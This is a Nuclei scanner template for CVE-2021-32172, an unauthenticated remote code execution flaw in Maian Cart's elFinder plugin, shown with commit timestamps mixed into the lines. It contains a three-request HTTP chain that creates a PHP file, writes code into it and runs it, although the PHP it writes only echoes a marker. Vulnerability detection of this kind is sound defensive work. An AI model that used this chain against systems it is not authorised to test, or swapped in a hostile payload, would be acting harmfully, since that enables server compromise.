nuclei-templates/http/cves/2021/CVE-2021-32172.yaml

65 lines
2.2 KiB
YAML
Raw Permalink Normal View History

id: CVE-2021-32172
info:
name: Maian Cart <=3.8 - Remote Code Execution
author: pdteam
severity: critical
description: Maian Cart 3.0 to 3.8 via the elFinder file manager plugin contains a remote code execution vulnerability.
2023-09-27 15:51:13 +00:00
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary code on the affected system.
2023-09-06 12:09:01 +00:00
remediation: |
Upgrade to a patched version of Maian Cart (>=3.8) to mitigate this vulnerability.
reference:
- https://dreyand.github.io/maian-cart-rce/
- https://github.com/DreyAnd/maian-cart-rce
- https://www.maianscriptworld.co.uk/critical-updates
- https://nvd.nist.gov/vuln/detail/CVE-2021-32172
2023-07-11 19:49:27 +00:00
- https://www.maianscriptworld.co.uk/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-32172
cwe-id: CWE-862
epss-score: 0.26906
epss-percentile: 0.9666
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:maianscriptworld:maian_cart:3.8:*:*:*:*:*:*:*
metadata:
max-request: 3
2023-07-11 19:49:27 +00:00
vendor: maianscriptworld
product: maian_cart
2024-01-14 09:21:50 +00:00
tags: cve2021,cve,rce,unauth,maian,intrusive,maianscriptworld
http:
- raw:
- |
GET /admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name={{randstr}}.php&target=l1_Lw HTTP/1.1
Host: {{Hostname}}
Accept: */*
- |
POST /admin/index.php?p=ajax-ops&op=elfinder HTTP/1.1
Host: {{Hostname}}
Accept: application/json, text/javascript, /; q=0.01
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
cmd=put&target={{hash}}&content=%3c%3fphp%20echo%20%22{{randstr_1}}%22%3b%20%3f%3e
- |
GET /product-downloads/{{randstr}}.php HTTP/1.1
Host: {{Hostname}}
Accept: */*
2023-07-11 19:49:27 +00:00
matchers:
- type: dsl
dsl:
- contains(body_3, "{{randstr_1}}")
- status_code_3 == 200
condition: and
extractors:
- type: regex
name: hash
group: 1
regex:
- '"hash"\:"(.*?)"\,'
2023-07-11 19:49:27 +00:00
internal: true
# digest: 4a0a00473045022100f283d7d444b82bed6cb1b19183a7f8d6bd8a88b11fc96b76cf49b230e8411e33022031f36c8b57fef33da59619e15c70ed2bd9771ec966a72529b3de2267bc883b76:922c64590222798bb761d5b6d8e72950